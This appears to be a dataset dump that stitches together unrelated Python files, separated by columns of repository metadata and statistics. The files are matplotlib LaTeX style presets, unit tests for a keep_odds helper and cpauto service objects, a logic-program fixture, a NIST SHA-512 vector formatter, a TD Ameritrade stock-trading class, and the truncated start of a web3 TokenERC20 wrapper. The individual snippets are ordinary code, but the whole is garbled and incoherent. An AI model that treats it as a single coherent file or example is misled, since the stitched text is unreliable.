        r"\usepackage[RGB]{xcolor}",
        r"\usepackage{fontspec}",
        r"\usepackage{unicode-math}",
        r"\setmainfont{STIX Two Text}",
        r"\setmathfont{STIX Two Math}",
        # r"\usepackage{stix2}",
        r"\usepackage{nicefrac}",
        r"\usepackage{siunitx}",
        r"\DeclareSIUnit{\molar}{M}",
        r"\DeclareSIUnit{\kb}{\ensuremath{\mathit{k_\textrm{B}}}}",
        r"\DeclareSIUnit{\kbT}{\ensuremath{\mathit{k_\textrm{B} T}}}",
    ]
)
# Near-black gray used for text/axes by the thin LaTeX style.
TEXTBLACK = "0.125"
def set_default_style():
    """Apply the default (non-LaTeX) matplotlib rc style."""
    plt.rcParams.update({
        # Lines
        "lines.linewidth": 1.0,
        "lines.markeredgewidth": 1.0,
        "lines.markersize": 5,
        # Fonts and symbols
        "font.family": "serif",
        "font.serif": "Times New Roman",
        "font.weight": "normal",
        "font.size": 8,
        "axes.titlesize": 8,
        "axes.labelsize": 8,
        "xtick.labelsize": 8,
        "ytick.labelsize": 8,
        "legend.fontsize": 8,
        "text.usetex": False,
        "mathtext.rm": "serif",
        "mathtext.it": "serif:italic",
        "mathtext.fontset": "stix",
        # Axes
        "axes.linewidth": 0.8,
        "axes.spines.right": False,
        "axes.spines.top": False,
        # Ticks
        "xtick.color": (0.0, 0.0, 0.0),
        "xtick.major.width": 0.8,
        "ytick.color": (0.0, 0.0, 0.0),
        "ytick.major.width": 0.8,
        # Errorbar plots
        "errorbar.capsize": 2,
        # Legend
        "legend.frameon": False,
        "legend.framealpha": 0.0,
    })
def set_thin_style():
    """Apply a thin-lined (non-LaTeX) matplotlib rc style."""
    plt.rcParams.update({
        # Lines
        "lines.linewidth": 0.5,
        "lines.markeredgewidth": 0.7,
        "lines.markersize": 2.5,
        # Fonts and symbols
        "font.family": "serif",
        "font.serif": "Times New Roman",
        "font.weight": "normal",
        "font.size": 8,
        "axes.titlesize": 8,
        "axes.labelsize": 8,
        "xtick.labelsize": 8,
        "ytick.labelsize": 8,
        "legend.fontsize": 8,
        "text.usetex": False,
        "mathtext.rm": "serif",
        "mathtext.it": "serif:italic",
        "mathtext.fontset": "stix",
        # Axes
        "axes.edgecolor": (0.0, 0.0, 0.0),
        "axes.linewidth": 0.5,
        "axes.spines.right": False,
        "axes.spines.top": False,
        # Ticks
        "xtick.color": (0.0, 0.0, 0.0),
        "xtick.major.width": 0.5,
        "ytick.color": (0.0, 0.0, 0.0),
        "ytick.major.width": 0.5,
        # Errorbar plots
        "errorbar.capsize": 1.0,
        # Legend
        "legend.frameon": False,
        "legend.framealpha": 0.0,
    })
def set_default_latex_style():
    """Apply the default LaTeX (pgf) rc style.

    Switches matplotlib to the "pgf" backend with lualatex and configures
    fonts, axes, ticks, errorbars and legend for publication figures.
    """
    mpl.use("pgf")
    # Lines
    plt.rcParams["lines.linewidth"] = 1.0
    plt.rcParams["lines.markeredgewidth"] = 1.0
    plt.rcParams["lines.markersize"] = 2.5
    # Fonts and symbols
    plt.rcParams["pgf.texsystem"] = "lualatex"
    plt.rcParams["pgf.rcfonts"] = False
    plt.rcParams["text.usetex"] = True
    plt.rcParams["font.family"] = "serif"
    plt.rcParams["font.serif"] = ["STIX Two Text"]
    plt.rcParams["text.color"] = "black"
    plt.rcParams["font.size"] = 8
    plt.rcParams["axes.titlesize"] = 8
    plt.rcParams["axes.labelsize"] = 8
    plt.rcParams["xtick.labelsize"] = 8
    plt.rcParams["ytick.labelsize"] = 8
    plt.rcParams["legend.fontsize"] = 8
    # Bug fix: the module-level constant is named SHARE_PGF_PREAMBLE; the
    # previous reference to SHARED_PGF_PREAMBLE raised NameError at call time.
    plt.rcParams["pgf.preamble"] = SHARE_PGF_PREAMBLE
    # Axes
    plt.rcParams["axes.edgecolor"] = "black"
    plt.rcParams["axes.labelcolor"] = "black"
    plt.rcParams["axes.linewidth"] = 0.8
    plt.rcParams["axes.spines.right"] = False
    plt.rcParams["axes.spines.top"] = False
    # Ticks
    plt.rcParams["xtick.color"] = "black"
    plt.rcParams["xtick.major.width"] = 0.8
    plt.rcParams["ytick.color"] = "black"
    plt.rcParams["ytick.major.width"] = 0.8
    # Errorbar plots
    plt.rcParams["errorbar.capsize"] = 2
    # Legend
    plt.rcParams["legend.frameon"] = False
    plt.rcParams["legend.framealpha"] = 0.0
def set_thin_latex_style():
    """Apply a thin-lined LaTeX (pgf) rc style using TEXTBLACK for text/axes."""
    mpl.use("pgf")
    plt.rcParams.update({
        # Lines
        "lines.linewidth": 0.5,
        "lines.markeredgewidth": 0.7,
        "lines.markersize": 2.5,
        # Fonts and symbols
        "pgf.texsystem": "lualatex",
        "pgf.rcfonts": False,
        "text.usetex": True,
        "font.family": "serif",
        "font.serif": ["STIX Two Text"],
        "text.color": TEXTBLACK,
        "font.size": 8,
        "axes.titlesize": 8,
        "axes.labelsize": 8,
        "xtick.labelsize": 8,
        "ytick.labelsize": 8,
        "legend.fontsize": 8,
        "pgf.preamble": SHARE_PGF_PREAMBLE,
        # Axes
        "axes.edgecolor": TEXTBLACK,
        "axes.labelcolor": TEXTBLACK,
        "axes.linewidth": 0.5,
        "axes.spines.right": False,
        "axes.spines.top": False,
        # Ticks
        "xtick.color": TEXTBLACK,
        "xtick.major.width": 0.5,
        "ytick.color": TEXTBLACK,
        "ytick.major.width": 0.5,
        # Errorbar plots
        "errorbar.capsize": 1.0,
        # Legend
        "legend.frameon": False,
        "legend.framealpha": 0.0,
    })
| 30.666667
| 70
| 0.631114
| 762
| 5,888
| 4.853018
| 0.141732
| 0.324229
| 0.09086
| 0.016225
| 0.868307
| 0.852893
| 0.847485
| 0.826393
| 0.82477
| 0.814494
| 0
| 0.025147
| 0.189538
| 5,888
| 191
| 71
| 30.827225
| 0.74979
| 0.047894
| 0
| 0.734848
| 0
| 0
| 0.360165
| 0.055217
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0
| 0.015152
| 0
| 0.045455
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dd36e26de922012af1b05843435a58e79cb984fc
| 110
|
py
|
Python
|
20181026-TestingInJupyter/tests/test_keep_odds.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 6
|
2017-10-31T20:54:37.000Z
|
2020-10-23T19:03:00.000Z
|
20181026-TestingInJupyter/tests/test_keep_odds.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 7
|
2020-03-24T16:14:34.000Z
|
2021-03-18T20:51:37.000Z
|
20181026-TestingInJupyter/tests/test_keep_odds.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 1
|
2019-07-29T07:55:49.000Z
|
2019-07-29T07:55:49.000Z
|
from keep_odds import keep_odds
def test_keep_odds():
    """keep_odds retains only the odd elements, preserving order."""
    result = keep_odds([1, 2, 3, 4, 5, 6])
    assert result == [1, 3, 5]
| 18.333333
| 53
| 0.627273
| 22
| 110
| 2.909091
| 0.590909
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 0.209091
| 110
| 5
| 54
| 22
| 0.632184
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dd3741224070231dbb8d9251b1cd4b56f761814c
| 10,565
|
py
|
Python
|
tests/objects/test_service.py
|
krnnrt/cpauto
|
6076ee0e3f55769aac5b2480453d82f99371a31f
|
[
"Apache-2.0"
] | 16
|
2016-12-07T02:45:31.000Z
|
2022-01-20T11:46:24.000Z
|
tests/objects/test_service.py
|
krnnrt/cpauto
|
6076ee0e3f55769aac5b2480453d82f99371a31f
|
[
"Apache-2.0"
] | 2
|
2017-07-20T21:12:27.000Z
|
2021-09-09T14:57:01.000Z
|
tests/objects/test_service.py
|
krnnrt/cpauto
|
6076ee0e3f55769aac5b2480453d82f99371a31f
|
[
"Apache-2.0"
] | 5
|
2017-07-28T14:06:25.000Z
|
2021-09-06T12:01:18.000Z
|
# -*- coding: utf-8 -*-
"""Tests for cpauto.objects.service module."""
import pytest
import responses
import cpauto
@pytest.mark.parametrize("name,params", [
    ("servicename", {}),
    ("servicename", {"tags": ["foo", "bar"]}),
])
def test_add(core_client, mgmt_server_base_uri, name, params):
    """Every service flavor can be added through its mocked API resource."""
    resources = ["add-service-tcp", "add-service-udp",
                 "add-service-sctp", "add-service-other",
                 "add-service-group", "add-service-dce-rpc",
                 "add-service-rpc"]
    with responses.RequestsMock() as rsps:
        resp_body = {'foo': 'bar', 'message': 'OK'}
        # Register a mocked POST endpoint for each add-* resource.
        for resource in resources:
            rsps.add(responses.POST, mgmt_server_base_uri + resource,
                     json=resp_body, status=200,
                     content_type='application/json')
        service_classes = [cpauto.ServiceTCP, cpauto.ServiceUDP,
                           cpauto.ServiceSCTP, cpauto.ServiceOther,
                           cpauto.ServiceGroup, cpauto.ServiceDCERPC,
                           cpauto.ServiceRPC]
        for service_class in service_classes:
            svc = service_class(core_client)
            if service_class is cpauto.ServiceSCTP:
                # SCTP services additionally require a port.
                r = svc.add(name=name, port='3000', params=params)
            else:
                r = svc.add(name=name, params=params)
            assert r.status_code == 200
            assert r.json() == resp_body
@pytest.mark.parametrize("name,uid,details_level", [
    ("servicename", "", ""),
    ("", "serviceuid", ""),
    ("servicename", "", "uid"),
    ("", "serviceuid", "full"),
])
def test_show(core_client, mgmt_server_base_uri, name, uid, details_level):
    """Every service flavor can be shown through its mocked API resource."""
    resources = ["show-service-tcp", "show-service-udp",
                 "show-service-sctp", "show-service-other",
                 "show-service-group", "show-service-dce-rpc",
                 "show-service-rpc"]
    with responses.RequestsMock() as rsps:
        resp_body = {'foo': 'bar', 'message': 'OK'}
        # Register a mocked POST endpoint for each show-* resource.
        for resource in resources:
            rsps.add(responses.POST, mgmt_server_base_uri + resource,
                     json=resp_body, status=200,
                     content_type='application/json')
        service_classes = [cpauto.ServiceTCP, cpauto.ServiceUDP,
                           cpauto.ServiceSCTP, cpauto.ServiceOther,
                           cpauto.ServiceGroup, cpauto.ServiceDCERPC,
                           cpauto.ServiceRPC]
        for service_class in service_classes:
            svc = service_class(core_client)
            r = svc.show(name=name, uid=uid, details_level=details_level)
            assert r.status_code == 200
            assert r.json() == resp_body
@pytest.mark.parametrize("name,uid,params", [
    ("servicename", "", {"tags": ["foo", "bar"]}),
    ("", "serviceuid", {"ignore-errors": True}),
])
def test_set(core_client, mgmt_server_base_uri, name, uid, params):
    """Every service flavor can be modified through its mocked API resource."""
    resources = ["set-service-tcp", "set-service-udp",
                 "set-service-sctp", "set-service-other",
                 "set-service-group", "set-service-dce-rpc",
                 "set-service-rpc"]
    with responses.RequestsMock() as rsps:
        resp_body = {'foo': 'bar', 'message': 'OK'}
        # Register a mocked POST endpoint for each set-* resource.
        for resource in resources:
            rsps.add(responses.POST, mgmt_server_base_uri + resource,
                     json=resp_body, status=200,
                     content_type='application/json')
        service_classes = [cpauto.ServiceTCP, cpauto.ServiceUDP,
                           cpauto.ServiceSCTP, cpauto.ServiceOther,
                           cpauto.ServiceGroup, cpauto.ServiceDCERPC,
                           cpauto.ServiceRPC]
        for service_class in service_classes:
            svc = service_class(core_client)
            r = svc.set(name=name, uid=uid, params=params)
            assert r.status_code == 200
            assert r.json() == resp_body
@pytest.mark.parametrize("name,uid,params", [
    ("servicename", "", {}),
    ("", "serviceuid", {}),
    ("servicename", "", {'details-level': 'full'}),
    ("", "serviceuid", {'ignore-errors': True}),
])
def test_delete(core_client, mgmt_server_base_uri, name, uid, params):
    """Every service flavor can be deleted through its mocked API resource."""
    resources = ["delete-service-tcp", "delete-service-udp",
                 "delete-service-sctp", "delete-service-other",
                 "delete-service-group", "delete-service-dce-rpc",
                 "delete-service-rpc"]
    with responses.RequestsMock() as rsps:
        resp_body = {'foo': 'bar', 'message': 'OK'}
        # Register a mocked POST endpoint for each delete-* resource.
        for resource in resources:
            rsps.add(responses.POST, mgmt_server_base_uri + resource,
                     json=resp_body, status=200,
                     content_type='application/json')
        service_classes = [cpauto.ServiceTCP, cpauto.ServiceUDP,
                           cpauto.ServiceSCTP, cpauto.ServiceOther,
                           cpauto.ServiceGroup, cpauto.ServiceDCERPC,
                           cpauto.ServiceRPC]
        for service_class in service_classes:
            svc = service_class(core_client)
            r = svc.delete(name=name, uid=uid, params=params)
            assert r.status_code == 200
            assert r.json() == resp_body
@pytest.mark.parametrize("limit,offset,order,details_level", [
    (50, 0, [], ''),
    (50, 0, [{'ASC': 'foo'}], ''),
    (64, 32, [{'DESC': 'bar'}], 'uid'),
])
def test_show_all(core_client, mgmt_server_base_uri,
                  limit, offset, order, details_level):
    """Verify show_all() on every service class POSTs to its show-*
    resource and passes the mocked 200/JSON response through unchanged.

    Collapses the original's seven copy-pasted stanzas into one loop;
    `responses` matches mocked endpoints by URL, so behavior is the same.
    Note the group resource is "show-service-groups" (singular 'service',
    plural 'groups'), unlike its siblings.
    """
    resources = [ "show-services-tcp", "show-services-udp",
                  "show-services-sctp", "show-services-other",
                  "show-service-groups", "show-services-dce-rpc",
                  "show-services-rpc" ]
    # One wrapper class per resource, in the same order as `resources`.
    service_classes = [ cpauto.ServiceTCP, cpauto.ServiceUDP,
                        cpauto.ServiceSCTP, cpauto.ServiceOther,
                        cpauto.ServiceGroup, cpauto.ServiceDCERPC,
                        cpauto.ServiceRPC ]
    with responses.RequestsMock() as rsps:
        resp_body = {'foo': 'bar', 'message': 'OK'}
        for resource in resources:
            endpoint = mgmt_server_base_uri + resource
            rsps.add(responses.POST, endpoint,
                     json=resp_body, status=200,
                     content_type='application/json')
        for service_class in service_classes:
            s = service_class(core_client)
            r = s.show_all(limit=limit, offset=offset,
                           order=order, details_level=details_level)
            assert r.status_code == 200
            assert r.json() == resp_body
| 33.433544
| 75
| 0.589494
| 1,317
| 10,565
| 4.577069
| 0.069096
| 0.081287
| 0.079628
| 0.069675
| 0.855508
| 0.846218
| 0.83079
| 0.823822
| 0.818182
| 0.818182
| 0
| 0.017649
| 0.276006
| 10,565
| 315
| 76
| 33.539683
| 0.770428
| 0.005963
| 0
| 0.79661
| 0
| 0
| 0.102801
| 0.009242
| 0
| 0
| 0
| 0
| 0.29661
| 1
| 0.021186
| false
| 0
| 0.012712
| 0
| 0.033898
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dd68549a483a60d2a06df1cfc83d73d0e4119a74
| 179
|
py
|
Python
|
tests/parser/wellfounded.12.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/wellfounded.12.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/wellfounded.12.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
# Round-trip parser fixture: `input` is the logic program handed to the
# parser and `output` is the text the test expects back.  The two
# literals are identical, so presumably the parser must echo this
# program unchanged -- TODO confirm against the harness that reads
# these module-level globals.
# NOTE(review): `input` shadows the `input` builtin; harmless in a
# standalone test fixture, but worth renaming if this file grows.
input = """
p :- not q.
q :- r.
r :- q.
s :- p.
t :- not s.
l :- u.
u :- t.
"""
output = """
p :- not q.
q :- r.
r :- q.
s :- p.
t :- not s.
l :- u.
u :- t.
"""
| 8.52381
| 12
| 0.284916
| 34
| 179
| 1.5
| 0.294118
| 0.156863
| 0.196078
| 0.235294
| 0.784314
| 0.784314
| 0.784314
| 0.784314
| 0.784314
| 0.784314
| 0
| 0
| 0.402235
| 179
| 20
| 13
| 8.95
| 0.476636
| 0
| 0
| 0.888889
| 0
| 0
| 0.809816
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
dd71ef357bd148e940782eb95a70b38cb38d99bd
| 35
|
py
|
Python
|
Test_Carlos_PuertoG.py
|
Sergio95480/Laboratorio
|
25c0d86dac48ce1e9b7ce9ec571241b0c5f80ba2
|
[
"MIT"
] | null | null | null |
Test_Carlos_PuertoG.py
|
Sergio95480/Laboratorio
|
25c0d86dac48ce1e9b7ce9ec571241b0c5f80ba2
|
[
"MIT"
] | null | null | null |
Test_Carlos_PuertoG.py
|
Sergio95480/Laboratorio
|
25c0d86dac48ce1e9b7ce9ec571241b0c5f80ba2
|
[
"MIT"
] | null | null | null |
def suma(x, y):
    """Return the sum (via the ``+`` operator) of *x* and *y*."""
    result = x + y
    return result
| 7
| 16
| 0.485714
| 7
| 35
| 2.428571
| 0.714286
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.371429
| 35
| 4
| 17
| 8.75
| 0.772727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
06b9580429e56f38e59672d6646ed56e82b296cc
| 1,587
|
py
|
Python
|
tests/test_generation/make_nist_sha512.py
|
colelawrence/orion
|
5554a09fa408552626baa132176da3852afded86
|
[
"MIT"
] | null | null | null |
tests/test_generation/make_nist_sha512.py
|
colelawrence/orion
|
5554a09fa408552626baa132176da3852afded86
|
[
"MIT"
] | null | null | null |
tests/test_generation/make_nist_sha512.py
|
colelawrence/orion
|
5554a09fa408552626baa132176da3852afded86
|
[
"MIT"
] | null | null | null |
def _format_rsp(in_path, out_path, total_cases):
    """Convert a NIST ``.rsp`` SHA-512 response file into a Rust array.

    Writes ``let test_vectors: [[&str; 2]; N] = [ ... ];`` to *out_path*
    with one ``["Msg", "MD"]`` pair per test case, then prints the number
    of cases actually found so it can be eyeballed against *total_cases*.

    :param in_path: path of the original NIST ``.rsp`` file.
    :param out_path: path of the formatted output file to create.
    :param total_cases: expected case count; becomes the Rust array
        length in the emitted header.
    """
    lines = []
    test_case_number = 0
    # `with` closes both handles even if parsing raises -- the original
    # opened `outfile` bare and leaked it on any error.
    with open(in_path) as infile, open(out_path, 'w') as outfile:
        outfile.write("let test_vectors: [[&str; 2]; %d] = [ " % total_cases)
        for line in infile:
            lines.append(line)
            if line.startswith("MD ="):
                test_case_number += 1
                # The message ("Msg = ...") is the line right before the
                # digest ("MD = ...") line in NIST .rsp files.
                data = (lines[-2].split(" = "))[1].rstrip()
                digest = (lines[-1].split(" = "))[1].rstrip()
                outfile.write("\n[\"%s\", \"%s\"],\n" % (data, digest))
        outfile.write("\n];") # Finish off the array
    print(test_case_number)


# 128 / 129 are the known test-case counts of the two NIST files; keep
# them in sync with the inputs.
_format_rsp('src/tests/test_data/original/SHA512LongMsg.rsp',
            'src/tests/test_data/SHA512LongMsg_fmt.txt', 128)
_format_rsp('src/tests/test_data/original/SHA512ShortMsg.rsp',
            'src/tests/test_data/SHA512ShortMsg_fmt.txt', 129)
| 31.117647
| 73
| 0.589162
| 212
| 1,587
| 4.278302
| 0.268868
| 0.105843
| 0.092613
| 0.070562
| 0.91731
| 0.91731
| 0.91731
| 0.868798
| 0.787211
| 0.703418
| 0
| 0.031483
| 0.239445
| 1,587
| 50
| 74
| 31.74
| 0.719967
| 0.141147
| 0
| 0.75
| 0
| 0
| 0.226499
| 0.130274
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.0625
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
06ba7d6c171d338094e19b3587564c72701945cd
| 5,053
|
py
|
Python
|
resources/Stock/stock.py
|
SamGulinello/TraderPy
|
651c0d04b5680c192f1098c8bb57cd2b57798ec0
|
[
"MIT"
] | 6
|
2020-12-27T00:27:55.000Z
|
2021-03-20T23:56:12.000Z
|
resources/Stock/stock.py
|
SamGulinello/TraderPy
|
651c0d04b5680c192f1098c8bb57cd2b57798ec0
|
[
"MIT"
] | 2
|
2021-01-07T16:26:52.000Z
|
2021-01-12T19:25:57.000Z
|
resources/Stock/stock.py
|
SamGulinello/TraderPy
|
651c0d04b5680c192f1098c8bb57cd2b57798ec0
|
[
"MIT"
] | 2
|
2020-12-28T15:04:35.000Z
|
2021-08-20T20:54:49.000Z
|
# TraderPY Stock Class
#
# Written By Sam Gulinello
# MIT Licensed
#
# For More Information About This Project Go to
# https://github.com/SamGulinello/TraderPY
import requests
from config.config import config
# TD Ameritrade API key, read once at import time from the project config.
client_id = config["client_id"]
# Each ticker will be converted to a stock object
class Stock():
    """Wrapper around the TD Ameritrade REST API for a single ticker.

    The three price-history methods shared an identical request body and
    the two order methods were byte-for-byte duplicates except for the
    instruction, so the public methods now delegate to the private
    helpers ``_price_history``, ``_average_open`` and ``_place_order``.
    Public method names, signatures and all request strings are unchanged.
    """

    def __init__(self, ticker):
        # Ticker symbol this instance operates on.
        self.ticker = ticker

    def _price_history(self, period_type, period):
        """Fetch price-history candles for this ticker.

        :param period_type: TD Ameritrade ``periodType`` value
            ('day' or 'month' in this class).
        :param period: number of periods to request, as a string.
        :returns: the ``candles`` list from the JSON response.
        """
        # Define the endpoint
        endpoint = "https://api.tdameritrade.com/v1/marketdata/{}/pricehistory".format(self.ticker)
        # NOTE(review): 'freqencyType' is preserved verbatim from the
        # original payload; it looks like a typo for 'frequencyType' --
        # confirm against the TD Ameritrade API before changing it.
        payload = {'apikey':client_id,
                   'periodType':period_type,
                   'freqencyType':'minute',
                   'frequency':'1',
                   'period':period,
                   'needExtendedHoursData':'true'}
        # Send the request and receive data
        content = requests.get(url=endpoint, params=payload)
        return content.json()['candles']

    def _average_open(self, period_type, period):
        """Return the mean 'open' price over the requested history."""
        candles = self._price_history(period_type, period)
        return sum(candle['open'] for candle in candles) / len(candles)

    def getCurrentPrice(self):
        """Return the most recent close price, caching it on
        ``self.currentPrice`` as a side effect."""
        ticker = self.ticker
        print("grabbing current price of " + ticker)
        candles = self._price_history('day', '1')
        # Close of the most recent one-day candle.
        currentPrice = candles[-1]['close']
        self.currentPrice = currentPrice
        print("Current Price: " + str(currentPrice))
        return(currentPrice)

    # Method to determine and return the 10 day average stock price of a company
    def tenDayAverage(self):
        """Return the ten-day average opening price."""
        return self._average_open('day', '10')

    def thirtyDayAverage(self):
        """Return the (roughly) thirty-day average opening price
        (one month of daily candles)."""
        return self._average_open('month', '1')

    def _place_order(self, instruction, quantity, account_id, headers):
        """POST a single MARKET day order for this ticker.

        :param instruction: 'Buy' or 'Sell'.
        :param quantity: number of shares.
        :param account_id: TD Ameritrade account the order is placed on.
        :param headers: auth headers for the request.
        """
        # define the endpoint for Saved orders, including your account ID
        endpoint = r"https://api.tdameritrade.com/v1/accounts/{}/orders".format(account_id)
        # define the payload, in JSON format
        payload = {'orderType':'MARKET',
                   'session':'NORMAL',
                   'duration':'DAY',
                   'orderStrategyType':'SINGLE',
                   'orderLegCollection':[{'instruction':instruction,'quantity':quantity,'instrument':{'symbol':self.ticker,'assetType':'EQUITY'}}]}
        # Send the request
        requests.post(url = endpoint, json = payload, headers = headers)

    def buyStock(self, quantity, account_id, headers):
        """Submit a market buy order for this ticker."""
        self._place_order('Buy', quantity, account_id, headers)

    def sellStock(self, quantity, account_id, headers):
        """Submit a market sell order for this ticker."""
        self._place_order('Sell', quantity, account_id, headers)
| 31.779874
| 139
| 0.578072
| 505
| 5,053
| 5.758416
| 0.259406
| 0.030949
| 0.030949
| 0.039546
| 0.809491
| 0.809491
| 0.809491
| 0.777854
| 0.777854
| 0.729367
| 0
| 0.004905
| 0.314071
| 5,053
| 158
| 140
| 31.981013
| 0.834103
| 0.240451
| 0
| 0.730769
| 0
| 0
| 0.227811
| 0.016592
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.025641
| 0
| 0.141026
| 0.025641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
06cbed5ac8b374d402ed5268cd4b938ec0ce65e8
| 183,683
|
py
|
Python
|
thirdweb/abi/token_erc20.py
|
nftlabs/nftlabs-sdk-python
|
ea533142dc0881872b347cd8ce635dc0bfff3153
|
[
"Apache-2.0"
] | 30
|
2021-10-31T13:17:58.000Z
|
2022-02-04T13:41:13.000Z
|
thirdweb/abi/token_erc20.py
|
nftlabs/nftlabs-sdk-python
|
ea533142dc0881872b347cd8ce635dc0bfff3153
|
[
"Apache-2.0"
] | 36
|
2021-11-03T20:30:38.000Z
|
2022-02-14T10:15:40.000Z
|
thirdweb/abi/token_erc20.py
|
nftlabs/nftlabs-sdk-python
|
ea533142dc0881872b347cd8ce635dc0bfff3153
|
[
"Apache-2.0"
] | 10
|
2021-11-10T19:59:41.000Z
|
2022-01-21T21:26:55.000Z
|
"""Generated wrapper for TokenERC20 Solidity contract."""
# pylint: disable=too-many-arguments
import json
from typing import ( # pylint: disable=unused-import
Any,
List,
Optional,
Tuple,
Union,
)
from eth_utils import to_checksum_address
from mypy_extensions import TypedDict # pylint: disable=unused-import
from hexbytes import HexBytes
from web3 import Web3
from web3.contract import ContractFunction
from web3.datastructures import AttributeDict
from web3.providers.base import BaseProvider
from zero_ex.contract_wrappers.bases import ContractMethod, Validator
from zero_ex.contract_wrappers.tx_params import TxParams
# Try to import a custom validator class definition; if there isn't one,
# declare one that we can instantiate for the default argument to the
# constructor for TokenERC20 below.
# Prefer a project-supplied validator; fall back to a local stand-in.
try:
    # both mypy and pylint complain about what we're doing here, but this
    # works just fine, so their messages have been disabled here.
    from . import ( # type: ignore # pylint: disable=import-self
        TokenERC20Validator,
    )
except ImportError:
    # No custom validator shipped with the package: define an empty
    # subclass so the rest of the module can instantiate it unchanged.
    class TokenERC20Validator(Validator): # type: ignore
        """No-op input validator."""
# Optional middleware hook; its absence is deliberately not an error.
try:
    from .middleware import MIDDLEWARE # type: ignore
except ImportError:
    pass
class ITokenERC20MintRequest(TypedDict):
    """Python representation of a tuple or struct.
    Solidity compiler output does not include the names of structs that appear
    in method definitions. A tuple found in an ABI may have been written in
    Solidity as a literal, anonymous tuple, or it may have been written as a
    named `struct`:code:, but there is no way to tell from the compiler
    output. This class represents a tuple that appeared in a method
    definition. Its name is derived from a hash of that tuple's field names,
    and every method whose ABI refers to a tuple with that same list of field
    names will have a generated wrapper method that refers to this class.
    Any members of type `bytes`:code: should be encoded as UTF-8, which can be
    accomplished via `str.encode("utf_8")`:code:
    """
    # Field semantics below are inferred from the names only -- the ABI
    # does not carry them; confirm against the TokenERC20 contract.
    to: str  # presumably the mint recipient address
    primarySaleRecipient: str  # presumably receives primary-sale proceeds
    quantity: int
    price: int
    currency: str  # presumably a token address used as payment currency
    validityStartTimestamp: int
    validityEndTimestamp: int
    uid: Union[bytes, str]  # per class docstring, bytes should be UTF-8
class ERC20VotesUpgradeableCheckpoint(TypedDict):
    """Python representation of a tuple or struct.
    Solidity compiler output does not include the names of structs that appear
    in method definitions. A tuple found in an ABI may have been written in
    Solidity as a literal, anonymous tuple, or it may have been written as a
    named `struct`:code:, but there is no way to tell from the compiler
    output. This class represents a tuple that appeared in a method
    definition. Its name is derived from a hash of that tuple's field names,
    and every method whose ABI refers to a tuple with that same list of field
    names will have a generated wrapper method that refers to this class.
    Any members of type `bytes`:code: should be encoded as UTF-8, which can be
    accomplished via `str.encode("utf_8")`:code:
    """
    # Returned by CheckpointsMethod.call(), which maps the on-chain tuple
    # positionally: returned[0] -> fromBlock, returned[1] -> votes.
    fromBlock: int
    votes: int
class DefaultAdminRoleMethod(ContractMethod): # pylint: disable=invalid-name
